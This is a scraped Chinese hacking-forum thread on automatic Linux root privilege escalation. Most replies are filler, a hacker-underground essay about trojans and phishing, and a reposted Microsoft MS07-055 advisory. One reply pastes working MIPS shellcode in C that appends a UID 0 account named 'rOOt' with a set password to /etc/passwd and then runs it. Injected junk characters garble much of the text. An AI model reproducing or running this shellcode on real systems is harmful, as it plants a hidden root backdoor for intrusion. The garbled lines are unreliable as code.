最近看过此主题的会员

返回列表 发帖

[技术讨论] Linux全自动提权脚本(Linux Auto Root)

提示: 作者被禁止或删除 内容自动屏蔽
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:vini5发表,本帖发表者vini5符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者vini5和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

回复 1# vini5
+ d: p/ s$ }1 M1 K+ z
$ W) {( P0 z$ H4 M! n$ e* d" x, L, c9 b3 y" S+ T$ i: W9 C. V5 h( ^
    Ubuntu可是少见Xday哦。" j" P- ^! ?8 ~

+ R* G2 B+ }3 W: e    全自动溢出的好处就是不需要去找对应的EXP,充分发挥了计算机的作用。) w6 o; u* F6 ^" \& ~, k
   

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

Linux/MIPS -add user(UID 0) with password
* Date:   2011-11-24# @/ Y1 g  G1 e" Y6 h7 A1 S
* Author: rigan - imrigan [at] gmail.com; N: C: G- X9 Q$ e/ n& _/ _
* Note:: F# U7 T9 e1 V: b& |$ ?
*         Username - rOOt+ J$ L3 ]7 A# Q6 x
*         Password - pwn3d
) {1 ~7 J2 @2 ?2 k */
' @% n. {3 g* S' m * R6 }6 w, B* v/ u% u- f% s
#include <stdio.h>2 \3 h0 F$ x9 [9 A

0 A2 S: i, ^( F- X0 R% l) a' Echar sc[] =
/ Z& C3 ?$ {) W! C6 N* `; M        "x24x09x73x50"       //  li      t1,29520
6 ^$ T/ c# X0 P- H' y" k        "x05x30xffxff"       //  bltzal  t1,400094 <L>$ J- d1 p% W0 A( H0 `
        "x24x09x73x50"       //  li      t1,29520 (nop)! i0 i  U6 n. z. W+ u% i. J" t
     . f; ~, l  \3 ^8 {- C, U
     /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */5 w: c( l  k# l( \) G5 v1 d
        "x3cx0fx30x2f"       //  lui     t7,0x302f
* z) m2 [. m0 x) f        "x35xefx65x74"       //  ori     t7,t7,0x6574
% k1 V4 Z3 \0 H+ J. i# k) d        "x3cx0ex63x2f"       //  lui     t6,0x632f   / J5 X3 A) a: r: m9 n
        "x35xcex70x61"       //  ori     t6,t6,0x7061% [3 F1 Z9 Q/ x3 l
        "x3cx0dx73x73"       //  lui     t5,0x7373# d% Y) f! A8 F' o7 q
        "x35xadx77x64"       //  ori     t5,t5,0x77649 x" d8 {  a" a, s
        "xafxafxffxf3"       //  sw      t7,-13(sp)
& A( t$ T! D/ k! M% D; n5 X    "xafxaexffxf7"       //  sw      t6,-9(sp)
/ Z' C+ V  L, {" u* H1 V3 s3 r    "xafxadxffxfb"       //  sw      t5,-5(sp): X# R" u4 I7 F6 D; t$ g
        "xafxa0xffxff"       //  sw      zero,-1(sp), a) M/ V# @1 Q, k4 B5 f, h* \- I, j' z
    "x27xa4xffxf4"       //  addiu   a0,sp,-12
' `8 G  s5 G: L3 E% G6 X        "x24x05x01x6d"       //  li      a1,365
0 K$ c& H# F0 z! }0 p4 f9 _        "x24x02x0fxa5"       //  li      v0,4005
" |9 o! |" j: b& q$ N. U        "x01x01x01x0c"       //  syscall 0x404047 x  D. K/ l9 v8 v. V+ I

" A& F* y7 s4 S    "xafxa2xffxfc"       //  sw      v0,-4(sp)
  M0 u/ Y: W$ @3 E     
3 p8 K& ?: f- T% W     /* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash
3 _$ [/ u4 w9 q9 _", 45); */
$ Y* [/ c4 l/ w: n+ b( ]6 F9 O8 y( K& K        "x8fxa4xffxfc"       //  lw      a0,-4(sp)
% F; i( C* b5 l2 H) ?" V/ ~        "x23xe5x10x0c"       //  addi    a1,ra,41081 Z9 D" o8 w8 U% M0 P' i8 i
        "x20xa5xf0x60"       //  addi    a1,a1,-4000
+ j5 E, u: u' I+ s; W: A        "x24x09xffxd3"       //  li      t1,-45& K" B0 t- ]5 m$ A" ~
        "x01x20x30x27"       //  nor     a2,t1,zero: W8 J: H' d: [& ^+ @9 h$ [& U7 a5 Z
        "x24x02x0fxa4"       //  li      v0,4004
' @9 \, s. o' H2 D        "x01x01x01x0c"       //  syscall 0x40404- K3 `4 n- q2 K# f
         
( t9 R  G, j( c% L4 c, X5 C      /* close(fd); *// u, I6 k" A1 J/ L
        "x24x02x0fxa6"       //  li      v0,4006, C' ~! {( w$ h
        "x01x01x01x0c"       //  syscall 0x40404
2 |8 ~9 s1 }9 |5 f& v7 }/ @; ^: x/ |     
; p% l( \  Z0 M1 P; l! ~      /* exit(0);  */# ?- v; R1 t. Q
       "x28x04xffxff"        //  slti    a0,zero,-10 D4 w% _! E2 q, v% {
       "x24x02x0fxa1"        //  li      v0,40013 T7 t1 a! |6 P, G: f9 i: X
       "x01x01x01x0c"        //  syscall 0x40404* a8 c( U$ N6 K4 c& m9 f9 r
      1 {) H( f3 V! `
      /*  "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash
, s# T& \% b5 y- [3 j# o" */2 B5 w+ T1 q2 o3 V: m; Y. x
       "x72x4fx4fx74"      
! {% M% [/ \- }/ x% m1 m6 A       "x3ax58x4ax31"       8 b; @2 ^) Y, K  ^+ L+ q. E+ p8 D
       "x47x56x2ex6e"      
& p) N  V! b: @       "x79x46x46x4d"      
5 y6 p. V6 |( U- M& ~" M       "x6fx49x3ax30"      
; E5 A( J) f6 X- x+ `2 W) ^% j2 S" ^       "x3ax30x3ax72"       : _! G+ M* c3 ^7 ]
       "x6fx6fx74x3a"      
2 Y7 L& W/ |& g* A7 F. _( d8 ?" s9 ?       "x2fx72x6fx6f"        p- K! p+ }- r
       "x74x3ax2fx62"      ! X2 q! \" k* V; {
       "x69x6ex2fx62"      
2 b2 ^& Z  p# ~       "x61x73x68x0a";       2 k4 O0 d! Y% Y3 }' c/ K% q8 z& D
       ( U: U$ {5 z; x; J/ N. w4 @/ {
void main(void)
- ~7 ?. t. M5 ?/ I/ W; [$ }{
6 _0 N5 _. [. u7 I/ i       void(*s)(void);
, L0 \  ^" K$ Z0 _" `5 ~       printf("size: %d
7 B7 y8 g4 j' s; Y7 p8 J) x5 j", strlen(sc));
$ E. {6 a2 b8 W% j# x% `       s = sc;/ d" g  O( ~( z& K# J4 E" z+ D
       s();! R  _" n/ ^) o( X
}
0 K/ P' b& L, j+ v% ~5 d
) D+ ~4 `3 U/ n
+ E' a1 P. ]5 A+ K3 y$ V$ K9 r1 P: O9 {9 }! v
8 ^4 T' C" V" L2 E/ w
: ^8 Z5 F" B; j( B6 c' Y
2 \& W" Q) e! ]1 e) R" g

! g9 T% O0 t4 @9 t6 p6 J* r# O) H
' Y& d* ?; ]7 U# l9 f+ E( F! m0 s, E; }* e

6 v+ l# g! D3 {. N1 ?2 z% F! W! O* g& [9 M% o2 H' C
1 N+ Z3 V* N  ~# C: y

7 q8 Y  |6 ^: y) W2 [/ O: _8 i  g9 x" e

7 t* q+ a; q1 d, c7 j
  o- c2 x  W! u1 [! d
; N' E4 f8 t+ p9 G" `
/ C$ k8 ^' I. v- l- K# R8 ?# P7 c3 s公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

顶顶更健康,越顶吃的越香。. S9 y! x" y' N; [' d' K. N, m

, M4 y, _1 [+ I: Y. o
5 A6 m+ v8 b# v* o* Y, |: ^) w( U) y7 D4 u( r! r

9 s9 Q. a# u' k, ^4 a
, N2 W: t- m: C; _! X( ?5 c, _* X: h) A( f) }( c" o" e2 W. U5 Y( E

8 W1 j" E) I3 M* x6 X0 f
* n, i" z* a! p' `* ?0 y- {
# V1 _, Z% D& G% C6 U
+ p" A7 |7 W, p! _* C7 x  t! h0 ]/ d0 M" P$ }4 F. \

2 V" L6 ~$ t7 {! I" s" W' |4 N" A3 \% f+ j4 w" d5 l4 U3 e

& u6 F1 e3 i& b) W) {
5 r2 f" e# s* ?* ]2 K: T3 ]( P& S% K* q

8 I$ S! q6 d% G5 h' l, Y
( C4 u/ W3 I1 [  o: s2 e公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

在windows目录下有很多这样的文件夹:$NT是病毒吗?
这个是自动更新后留下来的备份文件,比如$NTUnijstallKB927779就是KB927779更新后留下的!
+ j& K- v8 }' j
  u9 Z" H8 t: b
3 l2 Q" T+ `! i  i) Y. B3 V/ f/ m; w$ `  R
% y  r, r$ ^) D( x4 W

. n" y) T8 |% c, u7 Y, [
% P8 D3 t' W! X9 @/ V
- N: F& Q- r0 k/ j
' I# g6 w) T) X' s- `& {8 Z  R3 [! z

2 a% w1 ?" |$ z# w5 H. D1 x0 X2 M  a6 D+ e2 W1 ^% }

* {/ G, S. g: x9 T: W- V5 \5 N& V! ?. v) t0 R" Z

% Q3 c2 |: S5 ^  D) y% q, H; s. T
4 s# Q3 R: Q+ D, v9 T  ]
# q( ~+ H6 F  d8 Y' U% b' m7 A  s

' M! c! G. Y& K8 R. B" ]公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

照你这么说真的有道理哦 呵呵 不进沙子馁~~~ ( n8 R) v8 r& d( U" T2 k

/ _' X8 ^2 l0 P7 Y' g
; b$ c# F0 M1 p- P0 W# C5 g* ~: m% \) x. m7 t- g  I& e* f8 _2 K# C& s* N' i

- [$ @% s, G! z$ _
8 ]1 V6 d8 B& S0 N7 ~% w3 V; e% z" T6 e5 M+ n$ `7 W* ~
7 F3 m+ O* K" V

' w4 d; u2 P+ r* U6 H2 w# M1 Z+ a/ N' l8 F( d: F. J  [

' _: K4 s0 Q9 `' D* Q. F
$ X+ P& f8 }/ m1 o& |
0 _1 u" [$ G* ^# j- n. t
8 s) C$ m7 u) d, _
5 M# a# u8 v( N( _* R* F; G3 v
" \  D; p, x0 j3 W/ A( R# q
; _0 P2 ~. a  s1 z& ^7 f1 [# q3 c! u4 y- @, u. U+ l
) ^' q1 d2 N) T8 s% G- S; v$ E8 \( v
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

黑客游戏潜规则
“QQ木马求挂(无后门绝对免杀),按信封收费180元/W,进1W结算一次或每日0点至凌晨1点结算。结算方式:即时支付宝或工行转帐。联系QQ:XXXXX(请注明带挂QQ木马马)……收肉鸡了,收流量了,出售QQ号……” " P( ]+ ^6 ~6 J5 C* ^( H8 x0 L0 z1 Z
  看到这些信息你的表情也许可以用惊愕来形容,但对于另一些人来说,对这些信息已经习以为常了,因为这些信息经常会在一些技术群,网络安全站点上的论坛中出现。随着信息化社会的发展,各种各样的需求也在层出不穷的涌现。一些有技术的“黑客”们都在考虑如何让手中的那些代码转变成money,在他们眼中,也许能证明自己存在的价值早已蜕变成“这段代码到底能换多少张人民币”了,过去我们经常说“一切向前看”,如今都变成了一切向“钱”看了。

. g9 Y+ S' {5 l( N! R
  潜规则一:马披龙袍装麒麟,不变的是本质 从灰鸽子说黑客技术演进

- G2 M& Y* I5 U; \' F
  2003年初,互联网诞生了一个名为灰鸽子的工作室,开发出一套名为“远程控制系统”的软件,当时经过笔者的一些分析后,觉得还是把它定义为木马比较恰当。在后来,特别是今年,也验证了笔者当时的定论。“灰鸽子远程控制管理系统”只是木马的一个“马甲”而已。提到木马就不得不说一下著名的“冰河”(作者:黄鑫),它是早期的木马软件之一,操作简单方便,基于c/s(客户端/服务器端)模式开发。说到操作简单,你只需要在入侵后的主机上安装一个server.exe,在操作的主机安装client.exe就可以了。正是因为它容易上手,所以被更多的“黑客”们利用。如今的灰鸽子也是基于这样的技术架构开发出来的,但是它确实也有很多的改进,有自己独特的东西在里面,现在的灰鸽子可以被简单定位为反弹型后门木马。
# f: q4 X2 p$ Q* z* F: b7 C
  作者开发这个软件目的也许是想更加方便的管理远程主机,服务器等,又或许是想靠“远程控制软件”这个华丽的外表,赚取了更多的money。但无论出于什么样的目的,这款软件随着编写技术的提升,和产品的不断改进,逐渐出现了能逃避杀毒软件的版本。笔者曾经拿到这样的版本,在经过技术分析之后,得出以下结论:新版本的改进主要体现在加壳技术上,在原灰鸽子的基础上加层保护壳,使杀毒软件库中的病毒特征码无法与之匹配,从而达到躲避杀毒软件围剿的目的。目前,它的最新版本仍然可以轻松躲过瑞星、卡巴斯基、nod32等知名杀毒软件。
6 X7 `$ B2 ~. Y7 L0 }
  此规则点评:一场没有结局的猫鼠游戏,安全厂家不断的招募民间黑客提升自身产品实力,从而促使地下黑客技术不断完善,用于躲避追杀。说实话,谁都不容易。
8 N) a" @) {( _: D. b- M
  潜规则二:我出力,你付钱 这是理所当然 利益驱使黑客变质

4 c8 W6 O' Q# q4 U- Y* {! I# ~
  杀毒软件的原理主要是靠特征码比对技术,根据用户提交或者其他渠道捕获到的病毒样本制定出相应的病毒库,而病毒库中并没有真正的病毒源代码,只是病毒特征码。灰鸽子经过不屑的努力,终于飞进了千家万户,在非常多的主机和服务器上“落户”,给国家和个人的计算机系统造成了严重影响,一些“黑客”通过灰鸽子将个人用的生活照,夫妻照片等个人隐私泄露到网络中,而把政府机关和企业的一些机密信息拿来和business spy(商业间谍)做现金交易。总的来说这些都是利益驱使,更多的“黑客”会认为这是他的劳动所得,是靠双手和脑力劳动换取过来的,符合一分耕耘,一份收获的逻辑推理。

0 A( ~, |0 n. U' E0 q8 `- x0 o
  此规则点评:千古不变的至理名言——有钱能使鬼推磨。付出当然就要有实实在在的收获,谁说我做的不对,那准是在嫉妒,我是黑客我怕谁。

% F- S* G) B2 P, m
  潜规则三:一山不容二虎 两个和尚没水喝

; ?$ N, S% O3 u' M- Z
  2004年圈子出了更火暴的事情,因为入侵某官方站点的游戏数据库而获的不菲的利润,后因在分钱问题上,意见不和,用经济术语来讲就是不能达到利益共同点,最后两人在京城大打出手,双方都有一些损失由此演出了一场真人pk。后来两个主角还觉得不够过瘾,最后直接在著名的圈中论坛安全焦点上进行了长达100多页以上的对骂。更多圈子里面的人发表的看法是狗咬狗一嘴毛!入侵数据库虽说是赚钱,但是这钱来是见不得光的。当然,你是辛苦了,努力了,但是这是通过非法手段入侵得到的,从法律上说这就是违法的事,说起这两个人也是圈子中的名人,由于身在圈中的关系,两位主角的名字就不方便透漏了。
* o3 W, ]% P8 y- C! R
  此规则点评:黑客讲究协同作战,默契的配合永远都很重要,但在利益面前,团结的力量很容易疲软。这也是当今社会的普遍存在的潜规则。
; x/ P% G. k6 X
  潜规则四:黑客眼里没有拿不下的山头
% r0 }9 Z; g( Z% [. x
  越来越多的“黑客”都在靠“技术”吃饭,有些黑客拿下网络游戏数据库,通过提权后弄到整个服务器的控制权,刷装备,换金币来完成一些游戏装备交易;还有一些人甚至拿下境外的高利贷,赌博站点,在获得个人信息后,联系犯罪组织,狂刷受害人的信用卡,疯狂的购物;还有人利用技术制造出虚假银行站点,通过phishing(网络钓鱼)手段获取那些使用网上银行用户的真实信息,使用keybord loger (键盘记录器)或木马来捕获对方录入信息,从而拿到受害人个人信息,银行帐号的卡号及密码记录。
% L. w7 O, R3 P4 h' f4 V4 K% N+ v" ^
  此规则点评:只要被黑客盯上,如果没有强大的反黑力量支持,那你可以直接准备后事了。就算是有反黑的实力,毕竟明枪易躲,暗箭难防。
) g4 c, N! c% b9 v) S" F
  综上所述:各行各业都有道,有规则,黑客界里也一样,有人说黑客更多的给人的感觉是网络上收费的保安,保镖,安全公司呢就是镖局。互联网就是个虚拟的江湖,但是黑客是真实存在的,他们在里面充当着黑与白的角色,有的是充当杀手(破坏者cracker),有的是充当保镖(hacker),这就是黑客圈中的潜规则。江湖中,黑色交易每天都在幕后进行着,潜规则也将继续存在……。

9 W: L7 I6 l& V) j0 q' }
  未来的网络安全是不容忽视的,笔者在这里提醒广大的计算机用户:在熟练使用电脑的同时,要先学会保护自己,提高自身的网络安全知识和认识,这样至少可以避免一些不幸的发生。最后奉劝那些只想着赚钱的黑客兄弟们一句话:常在江湖混,早晚要还的,还是多做一些善事吧!
" z4 H; a* ]# [

" T( y% t2 ]8 o% R' U! ]
7 v9 w1 k- G" [1 u3 Z6 p$ s" W4 D1 i8 W
" q% ]" l( G: m8 g
: s* D; j% g9 `& q9 V/ }" d% U
* j# M. m. Z( i4 ]
* B$ F0 C* A( V

  k$ f3 {& t* m8 `7 X0 L9 A3 L" ?+ g% S' O) y1 b
7 @5 n9 z/ H! m8 V) E- {

) h5 v2 V2 B" ?& F# g( c' i  B: H: ^/ U3 @5 y! E. q5 d
" m, }3 B4 o4 ^! [( l
& o9 d" k8 p1 ^$ F) m. n1 h

; D, s0 Z  l' Y$ _4 q. C) D" c4 s' _) g. B2 ~) k9 z7 Y# E
2 q9 K- C  s* D% X/ w# G: B

, R( x9 h0 s; f公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS07-055:Kodak图像查看器可能允许远程执行代码
发布日期: 十月 9, 2007版本: 1.0
2 ^! Q3 Q' B1 w) p! H
此严重安全更新可消除一个秘密报告的漏洞。 Kodak 图像查看器(以前称为 Wang 图像查看器)处理特制图像文件的方式中存在一个远程执行代码漏洞。 该漏洞可能允许攻击者在受影响的系统上远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

0 d) ]( T: Q+ W* n" H. |. ?0 R' w
此漏洞仅存在于运行 Windows 2000 的系统上。但是,如果是从 Windows 2000 升级的,运行受支持版本的 Windows XP 和 Windows Server 2003 也可能受影响。这是 Windows 2000 Service Pack 4、Windows XP Service Pack 2 以及 Windows Server 2003 的受支持 32 版本的重要安全更新。此安全更新通过否决不再支持的文件类型并改进 Kodak 图像查看器处理特制文件类型的方式来消除此漏洞。

1 S, }3 q! F: m! U8 @; F- K, V
建议。 Microsoft 建议用户立即应用此更新。
5 a5 [, u3 A) K$ I: [
受影响的软件
: v* C  q( u4 ^4 X0 r
操作系统 最大安全影响 综合严重程度等级 此更新替代的公告  Microsoft Windows 2000 Service Pack 4 远程执行代码 严重 无 Windows XP Service Pack 2 远程执行代码 严重 无 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 无

- _: V9 q( B7 L
注意:除非是从 Windows 2000 进行升级的,否则 Windows XP 和 Windows Server 2003 所有受支持的版本不容易受到攻击。

- l0 s5 ]3 i; z. y
不受影响的软件

3 v$ ?% R: n, u) @, I' J
操作系统  Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Windows Vista Windows Vista x64 Edition

) b  j& D5 S! r; T+ q3 g6 N2 g8 W
微软的安全公告:
' f! `$ j, k# Z) F. Y+ @
http://www.microsoft.com/china/technet/security/bulletin/MS07-055.mspx
" \+ ~# U9 m  R, l% ^
(以上链接均连到第三方网站)
7 D# w9 z5 q# o$ k9 d
: _' z7 t  @: [
- V0 g7 L6 u" s6 S3 F. t

- w/ W5 @9 n* k3 M. q* O8 Q4 k+ k, L( W" _/ n0 ?
0 V2 N  s1 O- }! x

8 q, o/ ]* Z+ J. E+ {2 b6 W; B" S
8 j7 x( b8 p1 W" q

1 c# _8 {% S( a5 R  r3 J: f$ E0 t* e

* n7 D; [5 y( S( f, ~/ N) W2 W/ a$ S& ]* C- |) C3 z  L

0 Y1 h/ [& {1 V, m
5 Q" S# ^, L: C, z8 ~% }8 N$ B: W" ~( b% ~7 s  V3 @) }/ j/ \4 C
  G# G4 H. ]( O5 f- m9 T: J

) b7 [, a. A" _" h/ J9 E) ]. F+ @4 l& R/ U0 a
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表